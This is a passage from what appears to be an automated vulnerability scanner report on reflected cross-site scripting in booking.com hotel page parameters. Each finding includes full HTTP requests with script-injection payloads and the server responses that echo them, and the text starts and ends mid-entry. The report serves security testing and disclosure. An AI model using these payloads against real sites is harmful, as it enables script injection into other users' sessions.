X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232451
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
r transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPCfd3ac'-alert(1)-'e975783ca10;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Re
...[SNIP]...
4.190. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88360"><script>alert(1)</script>20235bacbb was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad88360"><script>alert(1)</script>20235bacbb&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:44 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIugJMp3Gj9PNlSuxcoQNwZ6LXSFeIzvYV8mPOyMjCm0pfd2bYFkXQeWt4y%2BN04%2BkdaH1SwlKJCzRrAwpDMbjINgmTAIE5GSS4ITKglwKIxqjD7RmuByDzu4X4Gwny%2FQydVmyxCeHTxM2rYHVXkHjy%2F3Uv9sSe3TBAPCTYb5iOv3WoMjUXcE%2BINjA%2BZO%2FtIKKjZywA8ETqYXJsvqoHzS%2B6aBroK%2BgwpmcxCeWNw%2B%2F67BSTcGIh5T13ieKnIYdjgz9glBqxUuQZiULjP%2BohZrAFsebIRaTl63AikGDnnWKgW0MTw8LjjNXYA4ekF80rSTCeLA3Gvcq3tIhg9vzYqWlkXJedr9bEgbZ55icgFaZ8HuxrL6FofPtwhEkNcKmH6l35oIPyuhIAwmIiGGEK8LbVZPTw0EbIxzckL9oJxI2czV8imiC8I4LF2RUz6eunrs7dtOKlaNslDuvAXILfF5tNxYA330HtBUeg29G%2F2xgHYKfQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:44 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232628
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad88360"><script>alert(1)</script>20235bacbb;utm_term=hotel-59554" />
...[SNIP]...
4.191. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8c0'-alert(1)-'25e8e054b4e was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad5a8c0'-alert(1)-'25e8e054b4e&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:53 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIuSFpakoAx7btwWpARpik40cFp4jGfSEtabG2VeVgNWWuFAj3bxJzcK25QSwEYw5kYv1AqYhBRMkxQqma0O5v%2Bql9s%2Bsr02%2BcR6JRA41hLBBZE7g9kHfIn8iiRNx8E4p8Cu40MNSH3cUNqfvKrT3M5nYeB%2FTBRdQ1SiBc3RiqsLLAfSi3PTrWrLhVlRc%2FFgaYDskWwaq9cAeyYQN4F7A%2B0ntfTP%2BDarcl6bCk7idorUw4No4o5NeUi9oFyELqGMAppbe3t6AElUMuVtFX4MVvMonk%2F80Dsp9avp3BMZDCBEbHU880XisObt1U0KZ9ptNRnm%2BPg59c7Mk14n6Eqlwe2eoR0sIMMJahT9wznD%2F51tVO%2F01y%2FbiDBBL3RYUEJEbrvcuHHIl8OXj7soBEijaeUIKRFHgJ%2FJsK%2Fs5Jc3ZfFaQ6NgUJ1TPiwhpDdV%2FfPNFkVOIi%2FObgCR050E28JNbSXKE9CixQQ3U66nZjDO1u2Rmw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:53 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ndo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad5a8c0'-alert(1)-'25e8e054b4e;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


bookin
...[SNIP]...
4.192. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cedf9"><script>alert(1)</script>8c314782dd2 was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554cedf9"><script>alert(1)</script>8c314782dd2&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:22 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oJuoDsbzEuXm91M4Yq8QgV8NDyjHv4fDd5sLK52Tm1P5VCYO6Z69%2BI4Aj5%2BquAS4YAFrhhxylbk1L65zXIxgImh48LSoZ71Yz7BcRKOwknLSuDxLkEM%2BiLSz1%2F2AN7ZgS103Yiv0VL44J77suOWr9l67IAC0Q6KlryEg%2F0t44%2Bl79vORzDB55izUvMZ9mmSXYTZf4zP3iKLXSKKiLOMHlGCGiwFgmEa3F%2BGl85BmDTIO1%2FZuUcPEB7N05hzkOeUp8FrCGjOhxbJ09HRfImLIXGLOm64a77thIs2%2ByiGHTCJXVjdnBkRSk6lG7RP3SjyaXMJzQLEwHkCQj2Kl92AJGH4cidRRNZb8iY3bSElGheUtnAKhVacsvNdG82M%2B4ffDGCG%2FatAP7y5TjLj3Vo7adlzV%2BfeKQ%2FYuE%2FEA9f10UyK7%2FjegYi2T%2BVn9HR7vDLADrxgYzEDp4s0BKSaD6ybuIhFLFpx8kdHgzMd2TYd%2BqJ4IA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:23 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232636
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554cedf9"><script>alert(1)</script>8c314782dd2" />
...[SNIP]...
4.193. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_term request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 638b3'-alert(1)-'dc24a3dc444 was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554638b3'-alert(1)-'dc24a3dc444&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlr